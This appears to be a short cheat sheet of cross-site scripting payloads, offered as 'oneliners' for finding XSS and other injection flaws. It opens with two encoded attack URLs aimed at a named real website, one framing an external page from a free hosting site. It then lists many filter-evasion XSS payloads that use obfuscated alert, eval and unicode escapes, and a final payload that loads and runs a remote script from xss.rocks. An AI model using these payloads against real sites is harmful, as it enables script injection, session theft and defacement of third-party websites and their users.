# XSS -

Trying something & experimenting new oneliner that helps in finding `xss,sql,ssrf,cmdi,htmli`

<mark style="color:yellow;">`https://smoothways.net/search.php?keyword=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E`</mark>

<mark style="color:green;">`https://smoothways.net/search.php?keyword=%22%3E%3Ciframe%20src%3D%22https%3A%2F%2Fcoffinxp.000webhostapp.com%2FCoffinEncript3.html%22%20style%3D%22border%3A%200%3B%20position%3Afixed%3B%20top%3A0%3B%20left%3A0%3B%20right%3A0%3B%20bottom%3A0%3B%20width%3A100%25%3B%20height%3A100%25%22%`</mark><mark style="color:green;">**`3E`**</mark>

***

```css
<iframe/src="data:text/html,<svg onload=alert(1)>">
```

```css
<input type=image src onerror="prompt(1)">
```

```css
<svg onload=alert(1)//
```

```css
<img src="/" =_=" title="onerror='prompt(1)'">
```

```css
<img src='1' onerror='alert(0)' <
```

```css
<script x> alert(1) </script 1=2
```

```css
<script x>alert('XSS')<script y>
```

```css
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
```

```css
<svg////////onload=alert(1)>
```

```css
<svg id=x;onload=alert(1)>
```

```css
<svg id=`x`onload=alert(1)>
```

```css
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
```

```css
<script>$=1,alert($)</script>
```

```css
<script ~~~>confirm(1)</script ~~~>
```

```css
<script>$=1,\u0061lert($)</script>
```

```css
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
```

```css
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
```

```css
</style></scRipt><scRipt>alert(1)</scRipt>
```

```css
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
```

```css
<svg><x><script>alert('1'&#41</x>
```

```css
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
```

```css
<svg><animate onbegin=alert() attributeName=x></svg>
```

```css
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
```

```css
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);"
```
